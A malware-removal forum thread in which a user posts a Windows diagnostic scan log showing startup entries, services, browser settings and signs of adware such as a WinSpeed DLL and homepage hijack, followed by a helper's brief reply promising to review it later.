C:\Users\Bri\AppData\Local\Facebook\Update\FacebookUpdate.exe
C:\Users\Bri\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Users\Bri\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\DDNi\Lenovo Smile Dock\CenterStage.exe
C:\windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\McAfee Online Backup\MOBKbackup.exe
C:\Program Files (x86)\McAfee Online Backup\MOBKbackup.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\windows\system32\vssvc.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Program Files\McAfee\MAT\McPvTray.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Bri\AppData\Local\Google\Chrome\Application\chrome.exe
C:\windows\system32\svchost.exe -k SDRSVC
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\windows\system32\NOTEPAD.EXE
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\servicing\TrustedInstaller.exe
C:\windows\system32\SearchFilterHost.exe
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.ask.com/?l=dis&o=APN10111&gct=hp
mStart Page = hxxp://www.google.com
uURLSearchHooks: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - <orphaned>
BHO: McAfee SiteAdvisor BHO: {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
TB: McAfee SiteAdvisor Toolbar: {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_bho.dll
uRun: [Steam] "C:\Program Files (x86)\Steam\Steam.exe" -silent
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
uRun: [Google Update] "C:\Users\Bri\AppData\Local\Google\Update\GoogleUpdate.exe" /c
uRun: [Facebook Update] "C:\Users\Bri\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
uRun: [DelayShred] "c:\PROGRA~1\mcafee\mqs\ShrCL.EXE" /P1 /q "G:\Flower - Lisa.JPG" "G:\Flower - Bailee.JPG" "G:\Elephant - Bri.JPG" "G:\DSCF7732.JPG" "G:\DSCF7727.JPG" "G:\Beach - Lisa.jpg" "G:\13 Titanium (feat. Sia).m4a" "G:\06 2 Reasons (feat. T.I.).m4a" "G:\DCIM" "G:\Mushroom - Lisa.JPG" "G:\Ladybug - Lisa.JPG"
uRun: [Amazon Cloud Player] "C:\Users\Bri\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe"
mRun: [VeriFaceManager] C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
mRun: [UpdateP2GShortCut] "C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Lenovo\Power2Go" UpdateWithCreateOnce "SOFTWARE\CyberLink\Power2Go\5.0"
mRun: [UCam_Menu] "C:\Program Files (x86)\Lenovo\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Lenovo\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\3.0"
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [mcui_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
mRun: [mcpltui_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
mRun: [AdobeCS5ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
dRunOnce: [WLStart] "C:\Program Files (x86)\Windows Live\Installer\wlstart.exe" /nosearch /nohomepage
dRunOnce: [{90140000-006E-0409-0000-0000000FF1CE}] C:\windows\System32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
dRunOnce: [{91140000-0011-0000-0000-0000000FF1CE}] C:\windows\System32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
StartupFolder: C:\Users\Bri\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Dropbox.lnk - C:\Users\Bri\AppData\Roaming\Dropbox\bin\Dropbox.exe
StartupFolder: C:\Users\Bri\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\FACEBO~1.LNK - C:\Users\Bri\AppData\Local\Facebook\Messenger\2.1.4814.0\FacebookMessenger.exe
StartupFolder: C:\Users\Bri\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ONENOT~1.LNK - C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\LENOVO~1.LNK - C:\Program Files (x86)\DDNi\Lenovo Smile Dock\Delay.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDrives = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Free YouTube to iPod Converter - C:\Users\Bri\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetoipodconverter.htm
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~1\Office14\ONBttnIE.dll/105
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
IE: {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Users\Bri\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU\Run IMVU.lnk
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll
IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{3349D9E5-FFC7-4C92-98BE-38877D14177D} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{3349D9E5-FFC7-4C92-98BE-38877D14177D}\2456C6B696E6F5E4F575962756C6563737F5246423243464 : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{3349D9E5-FFC7-4C92-98BE-38877D14177D}\348627F6D6563616374743635303 : DHCPNameServer = 192.168.255.249
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
AppInit_DLLs= c:\progra~3\winspeed\winspeed.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: McAfee SiteAdvisor BHO: {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-TB: McAfee SiteAdvisor Toolbar: {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Run: [Persistence] C:\windows\System32\igfxpers.exe
x64-Run: [OnekeyStudio] C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe
x64-Run: [IgfxTray] C:\windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\windows\System32\hkcmd.exe
x64-Run: [ETDWare] C:\Program Files (x86)\Elantech\ETDCtrl.exe
x64-Run: [EnergyUtility] C:\Program Files (x86)\Lenovo\Energy Management\utility.exe
x64-Run: [Energy Management] C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe
x64-Run: [cAudioFilterAgent] C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe
x64-Run: [Logitech Download Assistant] C:\windows\System32\rundll32.exe C:\windows\System32\LogiLDA.dll,LogiFetch
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
x64-Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Notify: igfxcui - igfxdev.dll
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\
FF - prefs.js: browser.search.defaulturl - 
FF - prefs.js: browser.search.selectedEngine - Secure Search
FF - prefs.js: browser.startup.homepage - hxxp://www.ask.com/?l=dis&o=APN10111&gct=hp
FF - prefs.js: keyword.URL - hxxp://search.yahoo.com/search?fr=mcafee&p=
FF - plugin: c:\PROGRA~2\mcafee\msc\npMcSnFFPl.dll
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: C:\Program Files (x86)\McAfee\SiteAdvisor\NPMcFFPlg32.dll
FF - plugin: C:\Program Files (x86)\McAfee\Supportability\MVT\NPMVTPlugin.dll
FF - plugin: C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll
FF - plugin: C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypchub.dll
FF - plugin: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\Bri\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll
FF - plugin: C:\Users\Bri\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll
FF - plugin: C:\Users\Bri\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll
FF - plugin: C:\Users\Bri\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
FF - plugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll
FF - plugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npgtpo3dautoplugin.dll
FF - plugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npo1d.dll
FF - plugin: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll
FF - plugin: C:\windows\SysWOW64\npDeployJava1.dll
FF - plugin: C:\windows\SysWOW64\npmproxy.dll
FF - ExtSQL: !HIDDEN! 2010-11-20 11:59; smartwebprinting@hp.com; C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
.
---- FIREFOX POLICIES ----
FF - user.js: yahoo.ytff.general.dontshowhpoffer - true
.
.
.
.
============= SERVICES / DRIVERS ===============
.
R0 McPvDrv;McPvDrv Driver;C:\windows\System32\drivers\McPvDrv.sys [2013-9-26 74560]
R0 mfehidk;McAfee Inc. mfehidk;C:\windows\System32\drivers\mfehidk.sys [2012-11-9 782360]
R1 mfewfpk;McAfee Inc. mfewfpk;C:\windows\System32\drivers\mfewfpk.sys [2012-11-9 343696]
R1 MOBKFilter;MOBKFilter;C:\windows\System32\drivers\MOBK.sys [2012-5-20 66040]
R2 cvhsvc;Client Virtualization Handler;C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE [2013-4-22 822504]
R2 f1f78e38;WinSpeed;C:\windows\System32\rundll32.exe [2009-7-13 45568]
R2 HomeNetSvc;McAfee Home Network;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2010-8-3 13336]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [2012-10-3 201304]
R2 McAPExe;McAfee AP Service;C:\Program Files\McAfee\MSC\McAPExe.exe [2013-1-31 178048]
R2 McMPFSvc;McAfee Personal Firewall Service;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 McNaiAnn;McAfee VirusScan Announcer;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 mcpltsvc;McAfee Platform Services;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 McProxy;McAfee Proxy Service;C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [2013-1-31 328928]
R2 mfecore;McAfee Anti-Malware Core;C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [2013-1-31 1025232]
R2 mfefire;McAfee Firewall Core Service;C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe [2013-1-31 219272]
R2 mfevtp;McAfee Validation Trust Protection Service;C:\windows\System32\mfevtps.exe [2013-1-31 182752]
R2 MOBKbackup;McAfee Online Backup;C:\Program Files (x86)\McAfee Online Backup\MOBKbackup.exe [2010-4-13 231224]
R2 nlsX86cc;Nalpeiron Licensing Service;C:\Windows\SysWOW64\nlssrv32.exe [2010-11-23 66560]
R2 Oasis2Service;Oasis2Service;C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe [2010-6-23 46080]
R2 sftlist;Application Virtualization Client;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe [2013-6-26 523944]
R2 TeamViewer7;TeamViewer 7;C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe [2012-3-12 2886528]
R2 UNS;Intel® Management & Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [2010-8-3 2320920]
R3 ACPIVPC;Lenovo Virtual Power Controller Driver;C:\windows\System32\drivers\AcpiVpc.sys [2010-8-3 28176]
R3 cfwids;McAfee Inc. cfwids;C:\windows\System32\drivers\cfwids.sys [2012-11-9 70112]
R3 ETD;ELAN PS/2 Port Input Device;C:\windows\System32\drivers\ETD.sys [2010-8-3 167816]
R3 HECIx64;Intel® Management Engine Interface;C:\windows\System32\drivers\HECIx64.sys [2010-8-3 56344]
R3 Impcd;Impcd;C:\windows\System32\drivers\Impcd.sys [2010-8-3 158976]
R3 IntcDAud;Intel® Display Audio;C:\windows\System32\drivers\IntcDAud.sys [2010-8-3 271872]
R3 mfeavfk;McAfee Inc. mfeavfk;C:\windows\System32\drivers\mfeavfk.sys [2012-11-9 311120]
R3 mfefirek;McAfee Inc. mfefirek;C:\windows\System32\drivers\mfefirek.sys [2012-11-9 519576]
R3 mfencbdc;McAfee Inc. mfencbdc;C:\windows\System32\drivers\mfencbdc.sys [2013-11-26 411944]
R3 Sftfs;Sftfs;C:\windows\System32\drivers\Sftfslh.sys [2013-6-26 767144]
R3 Sftplay;Sftplay;C:\windows\System32\drivers\Sftplaylh.sys [2013-6-26 273576]
R3 Sftredir;Sftredir;C:\windows\System32\drivers\Sftredirlh.sys [2013-6-26 28840]
R3 Sftvol;Sftvol;C:\windows\System32\drivers\Sftvollh.sys [2013-6-26 23208]
R3 sftvsa;Application Virtualization Service Agent;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [2013-6-26 207528]
R3 wdmirror;wdmirror;C:\windows\System32\drivers\WDMirror.sys [2010-8-3 11280]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 ReadyComm.DirectRouter;ReadyComm.DirectRouter;C:\windows\System32\IgrsSvcs.exe -k IgrsSvcs --> C:\windows\System32\IgrsSvcs.exe -k IgrsSvcs [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-9-5 171680]
S3 Bridge0;Bridge0;C:\windows\System32\drivers\WDBridge.sys [2010-8-3 79376]
S3 GamesAppService;GamesAppService;C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2010-10-12 206072]
S3 HipShieldK;McAfee Inc. HipShieldK;C:\windows\System32\drivers\HipShieldK.sys [2013-10-15 197704]
S3 IGRS;IGRS;C:\Program Files (x86)\Lenovo\ReadyComm\common\IGRS.exe [2009-7-14 38152]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;C:\windows\System32\drivers\k57nd60a.sys [2009-6-10 270848]
S3 Lenovo ReadyComm AppSvc;Lenovo ReadyComm AppSvc;C:\Program Files\Lenovo\ReadyComm\AppSvc.exe [2010-8-3 509192]
S3 Lenovo ReadyComm ConnSvc;Lenovo ReadyComm ConnSvc;C:\Program Files\Lenovo\ReadyComm\ConnSvc.exe [2010-8-3 579400]
S3 mfencrk;McAfee Inc. mfencrk;C:\windows\System32\drivers\mfencrk.sys [2013-11-26 96112]
S3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;C:\windows\System32\drivers\netw5v64.sys [2009-6-10 5434368]
S3 PS_MDP;ReadyComm Presentation Space Helper Service;C:\windows\System32\IgrsSvcs.exe -k IgrsSvcs --> C:\windows\System32\IgrsSvcs.exe -k IgrsSvcs [?]
S3 Revoflt;Revoflt;C:\windows\System32\drivers\revoflt.sys [2012-6-20 31800]
S3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;C:\windows\System32\drivers\RtsUStor.sys [2010-8-3 242720]
S3 RTL8167;Realtek 8167 NT Driver;C:\windows\System32\drivers\Rt64win7.sys [2010-8-3 239616]
S3 SwitchBoard;Adobe SwitchBoard;C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-2-19 517096]
S3 USBAAPL64;Apple Mobile USB Driver;C:\windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\windows\System32\Wat\WatAdminSvc.exe [2010-10-31 1255736]
S3 wsvd;wsvd;C:\windows\System32\drivers\wsvd.sys [2009-7-21 121840]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-01-09 00:40:57 -------- d-----w- C:\_OTL
2014-01-04 06:47:35 -------- d-----w- C:\ProgramData\regid.1986-12.com.adobe
2014-01-02 09:38:44 -------- d-----w- C:\Program Files (x86)\ShoPDroop
2014-01-02 09:38:16 -------- d-----w- C:\Program Files (x86)\DiggiCoauPOnu
2013-12-29 07:20:54 -------- d-----w- C:\ProgramData\WinSpeed
2013-12-27 02:00:58 368640 ----a-w- C:\windows\SysWow64\ReWire.dll
2013-12-27 02:00:58 233472 ----a-w- C:\windows\SysWow64\REX Shared Library.dll
2013-12-27 01:59:09 -------- d-----w- C:\Program Files (x86)\Ableton
.
==================== Find3M  ====================
.
2013-12-12 01:22:31 71048 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2013-12-12 01:22:31 692616 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2013-11-27 06:07:44 10856 ----a-w- C:\windows\System32\drivers\mfeclnrk.sys
2013-11-27 06:07:22 96112 ----a-w- C:\windows\System32\drivers\mfencrk.sys
2013-11-27 06:07:02 411944 ----a-w- C:\windows\System32\drivers\mfencbdc.sys
2013-11-05 00:51:44 70112 ----a-w- C:\windows\System32\drivers\cfwids.sys
2013-11-05 00:46:34 343696 ----a-w- C:\windows\System32\drivers\mfewfpk.sys
2013-11-05 00:46:16 182752 ----a-w- C:\windows\System32\mfevtps.exe
2013-11-05 00:43:04 782360 ----a-w- C:\windows\System32\drivers\mfehidk.sys
2013-11-05 00:41:22 519576 ----a-w- C:\windows\System32\drivers\mfefirek.sys
2013-11-05 00:40:00 311120 ----a-w- C:\windows\System32\drivers\mfeavfk.sys
2013-11-05 00:39:20 179792 ----a-w- C:\windows\System32\drivers\mfeapfk.sys
.
============= FINISH: 17:24:44.96 ===============
 

"Nothing says sausage like sausage!"


#15 Noviciate

Noviciate

  • Malware Response Team
  • 5,277 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Numpty HQ
  • Local time:08:37 PM

Posted 11 January 2014 - 03:03 PM

Good evening. :)

 

I'm a little busy this evening, so i'll take a look tomorrow and post then.


So long, and thanks for all the fish.

 

 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users